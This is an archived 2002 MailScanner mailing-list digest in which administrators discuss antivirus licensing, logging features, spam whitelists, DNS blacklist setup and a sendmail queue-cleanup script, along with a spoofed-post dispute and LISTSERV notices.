/dev/tty or somewhere like that, which is pretty difficult to > > stop happening. > > > > ># Proceed with disinfection of > > >./g8C3OFpc026394/periodd.com ([Y]es/[N]o/[A]ll) ?Proceed with disinfection > > >of ./g8C3RHpc026605/talent.com ([Y]es/[N]o/[A]ll) ?Proceed with > > >disinfection of ./g8C3bSpc027353/continue.com ([Y]es/[N]o/[A]ll) ? > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > > >-- > >- ( o o ) - >-------oOOo----(_)----oOOo------- > Ruel C. Bristol -=Raxie=- > Systems Administrator > Bulacan Info Tech > http://www.bulacan.ph > raxie@bulacan.ph >--------------------------------- -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 08:14:10 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: No subject In-Reply-To: References: <017601c25adf$74f957a0$3900a8c0@Daniel> Message-ID: <5.1.0.14.2.20020913081333.0485ba20@imap.ecs.soton.ac.uk> At 06:02 13/09/2002, you wrote: >There must be something wrong. In India, 10U SAVI cots US $220 equiv. I wouldn't be at all surprised if the price is different in different countries. The short answer to the original question is that they are all expensive except F-Prot which only charges per server and not per user. >Mohan > >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On >Behalf Of Daniel Tan >Sent: 13 September 2002 10:09 >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: > > >sophos is chargin around US$750 for just the sophos anti-virus from a local >company in my country..with 10 licenses which i don't need...likewise >everyone only needs the server license... > >----- Original Message ----- >From: "S Mohan" >To: >Sent: Friday, September 13, 2002 12:30 PM > > >We have had a few threads on this and recently someone was talking of Sophos >being expensive. Sophos licences SAVI for use. I believe we need to licence >out as many users of SAVI as mailbags or email ids for which mail is >scanned. They do not seem to have a server licence for a command line >version. F-Prot seems to be selling a server licence at $300. > >Can some one throw light on the licence and cost implications of various >scanners when used in conjunction with MailScanner please? > >Mohan -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 08:11:02 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: ANNOUNCE: Security release 3.22-14 In-Reply-To: <002d01c25abb$d6324c80$6701a8c0@matthew> References: <5.1.0.14.2.20020912223652.022cb290@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> At 01:23 13/09/2002, you wrote: > > I have just released version 3.22-14. > >Does this have any of the new 'spam bounce' features you spoke of? No. > Any idea >when you might release them? Once I'm sure the new release works. Testing 7,500 lines of code takes a little while... -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 08:10:31 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: what's this VC noise? In-Reply-To: References: <5.1.0.14.2.20020912225048.0242d298@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020913080944.04a95ee8@imap.ecs.soton.ac.uk> At 00:02 13/09/2002, you wrote: >On Thu, 12 Sep 2002, Julian Field wrote: > > > It's noise from Sophos. I've tried stopping it, but it looks like they > > output to /dev/tty or somewhere like that, which is pretty difficult to > > stop happening. > >OK, that's harmless then. > >So far, I like Sophos. It seems to work well and installation was easy. > >But I doubt my boss is willing to pay the kind of money the Sophos >people were talking about when I called them about licensing yesterday. > >Is it possible to use on Open-Source scanner like ClamAV and the >openantivirus.org database? It seems I heard somewhere that someone had >gotten mailscanner and clamav to work together. I've yet to see an Open Source scanner that is reliable enough (and up-to-date enough) to trust your mail to. If you want a cheap option, go for "F-Prot Small Business Edition" as they only charge $300 per server for that. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 08:09:32 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:37 2006 Subject: logging In-Reply-To: <1031869945.20266.19.camel@chaos.entrophy-free.net> References: <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020913080850.04a1e008@imap.ecs.soton.ac.uk> At 23:32 12/09/2002, you wrote: >On Thu, 2002-09-12 at 16:49, Julian Field wrote: > > At 18:48 12/09/2002, you wrote: > > >I understand that #5 would result in a large amount of data being > > >generated in log files however the problem that I am attempting to solve > > >is that the mailarchive function uses a *huge* amount of space when > > >enabled. In the end I am looking to generate per user, per domain and > > >summary statistics from this type of log. I can see where the TO field > > >may end up as a fairly long string. I understand if it seems impractical. > > > > Would your problem be solved by being able to archive different users' and > > different domains' mail in separate directories, where you could then just > > scan those directories themselves to produce reports on their contents? > > > > Would this be more useful than very verbose logs? > > > > >5. entries that could be used to create email usage reports. For each > > >email to have To, From, Subject, Date, bytes, and names of any attachments > > >would allow for easier creation of user reports. > > > > > >Is there a limit on the length of a log entry? These would be *very* long. > >If that sort of information was going to be logged, and I'm not sure if >that is something that MailScanner ought to be doing, it would seem to >me that it would make more sense to push the data into a file or a DB. >Syslog isn't very flexible in its logging format and we are talking >about a big growth in the log files. Seems to me that if it were going >into a separate log file or a DB the results would be easier to parse >and the maillog would remain more reasonable. The downside of that kind >of additional logging is that it is going to slow down MailScanner and >the code will be larger and more complex. Syslog already has hooks in it so that you can log to whatever file or program you like, I'm not going to re-invent the wheel :) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From S.R.Patterson at SOTON.AC.UK Fri Sep 13 08:57:10 2002 From: S.R.Patterson at SOTON.AC.UK (Patterson S.R.) Date: Thu Jan 12 21:15:37 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekag o.try reading it Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I think Jules is right. Dead thread. That being said, I do find the idea of someone spoofing someone else's email address to post to a list full of email experts rather amusing :) - -- Steven Patterson MSci OCP. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Computing Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc > -----Original Message----- > From: Tal Kelrich [mailto:tal@MUSICGENOME.COM] > Sent: 12 September 2002 19:11 > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent > you a weekago.try reading it > > > okay, this is a bit too much, spoofing other's mail address is > definitely _not_ done. > (suggestion though, PGP sign your mail.) > (another one for matt, when spoofing mail, DO NOT ADD YOUR SIG! heh) > On Thu, 2002-09-12 at 20:18, Gerry Doris wrote: > > I did NOT send this note! > > > > This was sent from someone at datawatch.com. It did > absolutely NOT come > > from me. I can guess who at datawatch.com sent it. > > > > Why in hell do we put up with this idiot??????????????? > > > > > > Gerry > > Doris > > > > > MessageI agree with Matt! > > > I want to know if I'm being heard as well! > > > > > > Matt Doherty > > > IT Dept > > > Datawatch Corp > > > > > >>>In a world without walls or fences, who needs Windows > and Gates?<< > > > > > > -----Original Message----- > > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > > Sent: Thursday, September 12, 2002 12:04 PM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Re: what are you rude?.. heres a copy of what > I sent you a > > > weekago.try reading it > > > > > > > > > Yeah, So do I. > > > I think the people of this list deserve to know what he > added from > > > their > > > suggestions. Don't you think? If your standing in line to get in a > > > concert, arn't you wondering if your going to get in - in > time to not > > > miss the beginning of a show. > > > Dont talk to me about money - I have done over 170,000 > dollars of > > > work > > > for nothing over 5 years and I am still polite to the > people I do it > > > for. That doesn't matter anyways. I asked a question > politely towards > > > this list probably 17 times and only got 15 of them > answered.. Meanwhile > > > off the subject questions get answered. > > > But I'm not rude about it either. I think the people in > this list > > > deserve > > > a better respons than that. I think we all wanted to know what he > > > considered and what he didn't. Otherwise we may think twice about > > > answering him next time. I spent 10 minutes trying to > think of some good > > > suggestions only to get a response stating "SUch As"? > > > I STATED 2 SUCH AS examples. That shows me how > carefully read these > > > posts > > > are in here. The public helped get this program where it > is today. Dont > > > get an ego over it. > > > > > > Matt Doherty > > > IT Dept > > > Datawatch Corp > > > > > > >>In a world without walls or fences, who needs Windows > and Gates?<< > > > > > > -----Original Message----- > > > From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] > > > Sent: Thursday, September 12, 2002 11:50 AM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: Re: what are you rude?.. heres a copy of > what I sent you a > > > week > > > ago.try reading it > > > > > > > > > Normally I leave arrogant posts like this alone, > because I find it's > > > a > > > waste of time to teach people manners in a forum like > this. But . . . > > > > > > If you want someone to complain to, yell at, rip > apart, be rude to, > > > etc > > > I've included a list of commercial anti-virus companies > that will gladly > > > put up with that for a few thousand+ dollars. > > > > > > http://www.nai.com/ > > > http://www.trendmicro.com/ > > > http://www.sophos.com/ > > > > > > Meanwhile if you plan on staying on this list, most > of us don't like > > > to > > > see Julian assaulted with attitudes like this. He's > saving me in the > > > neighborhood of $20,000, and that's not even counting the > reduced labor > > > I have to spend on his product compared to the big boy's > products, and I > > > come from a small shop. I can't imagine what he's saving > other people > > > in money. And here's the kicker, he works for FREE. > > > > > > > > > Steve Evans > > > (619) 594-0653 > > > > > > -----Original Message----- > > > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] > > > Sent: Thursday, September 12, 2002 7:40 AM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: what are you rude?.. heres a copy of what > I sent you a > > > week > > > ago. try reading it > > > > > > > > > such as > > > > > > > > > Matt Doherty > > > IT Dept > > > Datawatch Corp > > > > > > >>In a world without walls or fences, who needs Windows and > > > Gates?<< > > > > > > -----Original Message----- > > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > > Sent: Monday, September 09, 2002 4:34 PM > > > To: MailScanner mailing list > > > Subject: RE: New release logging suggestions > > > > > > > > > I would like to see some differant text in the log > per email virus > > > caught.. I grep the maillog to see how many viruses > caught so far that > > > week. For instance, I currently tried 'tail -2000 > /var/log/maillog | > > > grep > > >>>>Virus' of course the ">" symbols something that messes > grep up and > > >>>> wont > > > work. The only string that works best is just use the > word Virus ( tail > > > -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the > > > mailscanner restarting every four hours lines as well as > the viruses > > > caught. I cant think of anything good but maybe some > weird character > > > that is never seen in the maillog such as a & or pipe symbol? Just > > > something that grep could sniff out easily ONLY for > caught viruses. Or > > > do you have a better solution? The Email ID to go along > with it as well > > > would be nice. for ones that were scanned and ones that > were found to be > > > infected. > > > Hope that is a ok suggestion.. > > > Oh well Im still a newbie anyways 8-) > > > > > > Matt Doherty > > > IT Dept > > > Datawatch Corp > > > > > > >>In a world without walls or fences, who needs Windows and > > > Gates?<< > > > > > > -----Original Message----- > > > From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > Sent: Monday, September 09, 2002 5:14 PM > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > Subject: New release logging suggestions > > > > > > > > > The new release is getting there... > > > > > > What logging would people like to see? > > > Anything particular that you want logged? > > > > > > Suggestions please. > > > -- > > > Julian Field Teaching Systems Manager > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > Computer Science Tel. > > > 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > > > > > Gerry > > > -- > Tal Kelrich > > PGP Fingerprint: 3EDF FCC5 60BB 4729 AB2F CAE6 FEC1 9AAC 12B9 AA69 > PGP key-id: 12B9AA69 > -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPYGaVK2fOiTs5+WvEQIn5QCglzOgO7wgIKEODknenPA6MPWsIf0AoMGq nX4U+niFM2WIzC6dIZqG6ieG =imML -----END PGP SIGNATURE----- From ft at IT.SU.SE Fri Sep 13 09:27:40 2002 From: ft at IT.SU.SE (Fredrik Thulin) Date: Thu Jan 12 21:15:37 2006 Subject: ANNOUNCE: Security release 3.22-14 In-Reply-To: <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912223652.022cb290@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> Message-ID: <200209131027.40066.ft@it.su.se> On Friday 13 September 2002 09.11, Julian Field wrote: ... > Once I'm sure the new release works. Testing 7,500 lines of code takes a > little while... my suggestion is to let people willing to help you. /Fredrik From mailscanner at BARENDSE.TO Fri Sep 13 09:35:18 2002 From: mailscanner at BARENDSE.TO (Remco Barendse) Date: Thu Jan 12 21:15:37 2006 Subject: Feature request In-Reply-To: <200209131027.40066.ft@it.su.se> Message-ID: >From some domains we get e-mail messages that contain regular message text in HTML script format. In Outlook this show up as the funny scroll in every message. I am not particularly fond of HTML scripts to say the least. Is there any way to convert these scripts to regular HTML or otherwise harmless text? The stupid thing is that if you reply to such a message the script remains in the message. Cheers! From dave at ESI.COM.AU Fri Sep 13 10:49:38 2002 From: dave at ESI.COM.AU (Dave Horsfall) Date: Thu Jan 12 21:15:37 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekag o.try reading it In-Reply-To: Message-ID: On Fri, 13 Sep 2002, Patterson S.R. wrote: > That being said, I do find the idea of someone spoofing someone else's > email address to post to a list full of email experts rather amusing Darwinian, almost. -- Dave Horsfall DTM VK2KFU dave@esi.com.au Ph: +61 2 9906-3377 Fx: 9906-3468 (Unix Guru) Pacific ESI, Unit 22, 8 Campbell St, Artarmon, NSW 2065, Australia From chicks at CHICKS.NET Fri Sep 13 12:32:27 2002 From: chicks at CHICKS.NET (Christopher Hicks) Date: Thu Jan 12 21:15:37 2006 Subject: what are you rude? In-Reply-To: Message-ID: On Fri, 13 Sep 2002, Patterson S.R. wrote: > That being said, I do find the idea of someone spoofing someone else's > email address to post to a list full of email experts rather amusing > :) Eudora used to have this "forward and edit" feature that I saw people misusing semi-regularly to inadvertantly cause e-mail spoofing. I was ready to climb through the Internet and beat them with a stick when they impersonated me! [insert really mad cat noises.] ObMailScanner: does anybody have any instructions for setting up your own dns blacklist? And thanks for all the good work! -- Camels may be nasty beasts, but they're the only way to get through the desert. From P.G.M.Peters at civ.utwente.nl Fri Sep 13 12:58:24 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:37 2006 Subject: what are you rude? In-Reply-To: References: Message-ID: On Fri, 13 Sep 2002 07:32:27 -0400, you wrote: >ObMailScanner: does anybody have any instructions for setting up your own >dns blacklist? And thanks for all the good work! If you have access to a nameserver and a domain you can create a sub-domain and accompanying zonefile with: Subdomain: forw-bl.chicks.net And in the zone-file entries like spamdomain.COM IN A 127.0.0.1 IN TXT "spammed me om 13/9/2002" Or rev-bl-chicks.net And: 15.18.6.27 IN A 127.0.0.1 IN TXT "spammed me on 13/9/2002" Disclaimer: All references to any existing domains or IP-addresses is unintentionally and considence. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From andersan at LTKALMAR.SE Fri Sep 13 13:21:45 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:37 2006 Subject: Regarding support for other SA software Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB21@lkl22.ltkalmar.se> Hi I know this might be a little off topic but have anyone figured out how to use spambouncer with mailscanner? A frind liked that better then SA and I just thought I should ask. /Anders From brose at MED.WAYNE.EDU Fri Sep 13 15:04:23 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:37 2006 Subject: Feature Request Message-ID: Mqueue.in cleanup... Every now and then I find that performance starts to lag and when I check into things, I find orphaned df files in mqueue.in. Typically these are large files, like today there was 3meg and 9.9meg I think mailscanner will still try processing these files at every run even though they don't have an associated qf file. If you just run virus scanning you may not notice it, but if using the SpamChecks, you'll see the slow down in the form of mqueue.in backing up. Yeh it might be good to figure out the cause of them but they are so far and few between that it's not worth it. My guess is that maybe the df is locked by sendmail because it's still receiving and mailscanner just picks up the qf and sends it on. So the request is to have mailscanner delete the orphans if it happens upon one. -=B From gdr at GNO.ORG Fri Sep 13 15:34:27 2002 From: gdr at GNO.ORG (Devin Reade) Date: Thu Jan 12 21:15:37 2006 Subject: [OT] Which f-secure product is f-prot? Message-ID: <6700000.1031927667@[192.168.50.4]> F-prot has been mentioned in the past as being an inexpensive but good commercial scanner. I'm looking on the f-secure products page (), and it is not obvious which is the correct product for use with mailscanner. I suspect that it is the "F-Secure Anti-Virus for File Servers", but I would appreciate it if someone who uses f-prot could verify this, preferably with an explicit URL. Thanks in advance. -- Devin Reade From P.G.M.Peters at civ.utwente.nl Fri Sep 13 15:47:43 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:37 2006 Subject: [OT] Which f-secure product is f-prot? In-Reply-To: <6700000.1031927667@[192.168.50.4]> References: <6700000.1031927667@[192.168.50.4]> Message-ID: On Fri, 13 Sep 2002 08:34:27 -0600, you wrote: >F-prot has been mentioned in the past as being an inexpensive >but good commercial scanner. I'm looking on the f-secure products >page (), and it is >not obvious which is the correct product for use with mailscanner. You should go to www.f-prot.com. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From S.R.Patterson at SOTON.AC.UK Fri Sep 13 15:52:49 2002 From: S.R.Patterson at SOTON.AC.UK (Patterson S.R.) Date: Thu Jan 12 21:15:37 2006 Subject: Feature Request Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > -----Original Message----- > From: Rose, Bobby [mailto:brose@MED.WAYNE.EDU] > Sent: 13 September 2002 15:04 > > Mqueue.in cleanup... I run the following (untidy and wasteful) bit of shell every night, others may find it handy. Note that the order of these operations is important. #!/bin/sh # Delete zero length qf files #echo "Deleting zero length QF files" cd /var/spool/mqueue for QFFILENAME in qf*; do if [ ! -s $QFFILENAME ]; then rm -f $QFFILENAME fi done cd /var/spool/mqueue.in for QFFILENAME in qf*; do if [ ! -s $QFFILENAME ]; then rm - f $QFFILENAME fi done # Delete [A-Z]f files older than three days #echo "Delete [A-Z]f files older than 3 days" find /var/spool/mqueue -name [A-Z]f\* -mtime +3 | xargs rm -f find /var/spool/mqueue.in -name [A-Z]f\* -mtime +3 | xargs rm -f # Rename tf to qf if no qf..... #echo "Remaning tf to qf where no qf exists" cd /var/spool/mqueue for i in tf*; do SHORTNAME=`echo $i|cut -c3-` if [ ! -f qf${SHORTNAME} ]; then mv $i qf${SHORTNAME} fi done cd /var/spool/mqueue.in for i in tf*; do SHORTNAME=`echo $i| cut -c3-` if [ ! -f qf${SHORTNAME} ]; then mv $i qf${SHORTNAME} fi done # Delete df files with no qf #echo "Deleting df files with no qf" cd /var/spool/mqueue for i in df*; do SHORTNAME=`echo $i| cut -c3-` if [ ! -f qf${SHORTNAME} ]; then rm -f $i fi done cd /var/spool/mqueue.in for i in df*; do SHORTNAME=`echo $i | cut -c3-` if [ ! -f qf${SHORTNAME} ]; then rm -f $i fi done - -- Steven Patterson MSci OCP. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Computing Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPYH7wa2fOiTs5+WvEQIH+QCgtfbOImZy99foZ2lN64qCQOSTVB4AoI/Y jwvv4T9s0jtorXRcng4fBWj6 =EGjY -----END PGP SIGNATURE----- From paul_houselander at BRISTOL-LEA.ORG.UK Fri Sep 13 15:42:45 2002 From: paul_houselander at BRISTOL-LEA.ORG.UK (Paul Houselander) Date: Thu Jan 12 21:15:37 2006 Subject: [OT] Which f-secure product is f-prot? References: <6700000.1031927667@[192.168.50.4]> Message-ID: <013a01c25b33$d2dc2e20$7b10140a@education.bcc.lan> I got it from http://www.f-prot.com/download/getfplinfree.html Note the "The license for F-Prot Linux for Small Business is without charge for personal users, when used on personal workstations." So you will need to talk to f-prot re how much the license will be for your setup. Paul Houselander ----- Original Message ----- From: "Devin Reade" To: Sent: Friday, September 13, 2002 3:34 PM Subject: [OT] Which f-secure product is f-prot? > F-prot has been mentioned in the past as being an inexpensive > but good commercial scanner. I'm looking on the f-secure products > page (), and it is > not obvious which is the correct product for use with mailscanner. > > I suspect that it is the "F-Secure Anti-Virus for File Servers", > but I would appreciate it if someone who uses f-prot could > verify this, preferably with an explicit URL. > > Thanks in advance. > -- > Devin Reade > > -- > This message has been scanned for viruses and > dangerous content by MailScanner, and is > believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. From WPS.MFRIEDEL at WPSIC.COM Fri Sep 13 15:52:00 2002 From: WPS.MFRIEDEL at WPSIC.COM (FRIEDEL, MARK) Date: Thu Jan 12 21:15:37 2006 Subject: Rejected posting to MAILSCANNER@JISCMAIL.AC.UK Message-ID: <200209131452.zQ52@wpsic.com> --- Received from WPS.MFRIEDEL 224-2255 09-13-02 952a Help! First off, we use a really antiquated mainframe-based email package. I signed up for the list from the web page and entered my email address as mfriedel@wpsic.com I receive the postings to the list. But, my outbound mail (due to our package) becomes wps.mfriedel@wpsic.com Because of this I can't post messages, or unsubscribe. Can you correct my user info to reflect my "correct" email of wps.mfriedel@wpsic.com ? Thanks Mark Friedel WPS Health Insurance From: LISTSERV@JISCMAIL.AC.UK To: WPS.MFRIEDEL@WPSIC.COM Date: Fri, 13 Sep 2002 15:36:38 +0100 Subject: Rejected posting to MAILSCANNER@JISCMAIL.AC.UK You are not authorized to send mail to the MAILSCANNER list from your WPS.MFRIEDEL@WPSIC.COM account. You might be authorized to send to the list from another of your accounts, or perhaps when using another mail program which generates slightly different addresses, but LISTSERV has no way to associate this other account or address with yours. If you need assistance or if you have any question regarding the policy of the MAILSCANNER list, please contact the list owners: MAILSCANNER-request@JISCMAIL.AC.UK. ---- 09-13-02 952a ---- Sent to ---------------------------------------- -> MAILSCANNER-request@JISCMAIL.AC.UK -------------- next part -------------- A non-text attachment was scrubbed... Name: TXT00000.TXT Type: application/octet-stream Size: 1701 bytes Desc: not available Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020913/f86e36d3/TXT00000.obj From G.Welter at ROCLEIDEN.NL Fri Sep 13 15:55:23 2002 From: G.Welter at ROCLEIDEN.NL (G Welter) Date: Thu Jan 12 21:15:37 2006 Subject: [OT] Which f-secure product is f-prot? Message-ID: Hi. You're looking at the wrong website. F-prot is not from F-secure. Look for F-prot here: http://www.f-prot.com/products/fplin.html I know, it's confusing :-) Gerben. >>> gdr@GNO.ORG 09/13/02 04:34PM >>> F-prot has been mentioned in the past as being an inexpensive but good commercial scanner. I'm looking on the f-secure products page (), and it is not obvious which is the correct product for use with mailscanner. I suspect that it is the "F-Secure Anti-Virus for File Servers", but I would appreciate it if someone who uses f-prot could verify this, preferably with an explicit URL. Thanks in advance. -- Devin Reade From billa at STERLING.NET Fri Sep 13 16:43:31 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:37 2006 Subject: Selective spam filtering? In-Reply-To: <5.1.0.14.2.20020913081115.04a9cb50@imap.ecs.soton.ac.uk> Message-ID: I have been playing around with the whitelist, but I can't seem to figure out the best way to accomplish what I need. Basically I have a domain, somedomain.com, which has about 3000 email accounts on another mail server. Only about 100 of the accounts want spam filtering. From what I can see with the whitelist, I need to put 2990 To: accounts in the whitelist. I guess it could be done, but it would be a management nightmare. Is there an easier way to just identify the 100 accounts as getting filtered, while leaving the other 2990 unfiltered. Thanks. At 02:56 13/09/2002, you wrote: >I am currently using mailscanner with spamassassin and sendmail. I am only >using the spam feature to filter spam for specific domains that are hosted >on other mail servers. Can I only spam filter for certain addresses in the >domain, while letting everything else through? > >someone@somedomain.com gets filtered >*@somedomain.com no filtering > >Is this possible with my config? Yes, the spam whitelist lets you do exactly this. Take a look at the sample supplied spam.whitelist.conf file. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 16:41:14 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:37 2006 Subject: MAILSCANNER: alfredo@SANKOFASYSTEMS.COM requested to join Message-ID: <200209131541.QAA06140@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 16:41:14 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Alfred Owusu . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER alfredo@SANKOFASYSTEMS.COM Alfred Owusu The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+alfredo%40SANKOFASYSTEMS.COM+Alfred+Owusu&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 16:53:27 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:37 2006 Subject: MAILSCANNER: krice@TLCDELIVERS.COM left the list Message-ID: <200209131553.QAA07352@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 16:53:27 Ken Rice has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 16:58:20 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:38 2006 Subject: MAILSCANNER: krice@TLCDELIVERS.COM requested to join Message-ID: <200209131558.QAA08083@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 16:58:20 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Ken Rice . The following subscription options have been requested: NOMIME DIGEST. You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER krice@TLCDELIVERS.COM Ken Rice The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+krice%40TLCDELIVERS.COM+Ken+Rice&L=MAILSCANNER This first link will add the subscriber to the list. You can then set the subscription options with this link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=SET+MAILSCANNER+NOMIME+DIGEST+FOR+krice%40TLCDELIVERS.COM&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From hciss at HCIWS.COM Fri Sep 13 17:09:53 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:38 2006 Subject: Selective spam filtering? References: Message-ID: <010501c25b40$01f408c0$6701a8c0@matthew> > I have been playing around with the whitelist, but I can't seem to figure > out the best way to accomplish what I need. > > Basically I have a domain, somedomain.com, which has about 3000 email > accounts on another mail server. Only about 100 of the accounts want spam > filtering. From what I can see with the whitelist, I need to put 2990 To: > accounts in the whitelist. I guess it could be done, but it would be a > management nightmare. > > Is there an easier way to just identify the 100 accounts as getting > filtered, while leaving the other 2990 unfiltered. Thanks. I would be very interested in this too. To make it more complicated. I would like to bounce all emails for everyone if they are in ORDB or SPAMcop and only use SpamAssassin to tag messages for a select few. Spamassassin falses too much and many don't like it tagging there email. Some are so hard hit by spam they want it though. Matt From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 17:15:35 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:38 2006 Subject: Change in your e-mail address for the MAILSCANNER list Message-ID: <200209131615.RAA10265@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 17:15:35 Julian Field has just changed your e-mail address in the MAILSCANNER list from mfriedel@WPSIC.COM to wps.mfriedel@WPSIC.COM. All your subscription options and related settings have been transferred, except for your personal LISTSERV password (if you had one). From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 17:17:35 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:38 2006 Subject: MAILSCANNER: alfredo@SANKOFASYSTEMS.COM left the list Message-ID: <200209131617.RAA10451@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 17:17:35 Alfred Owusu has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Fri, 13 Sep 2002 17:17:35 +0100 Received: from sankofa01.sankofasystems.com (183.208-38-40-0.interbaun.com 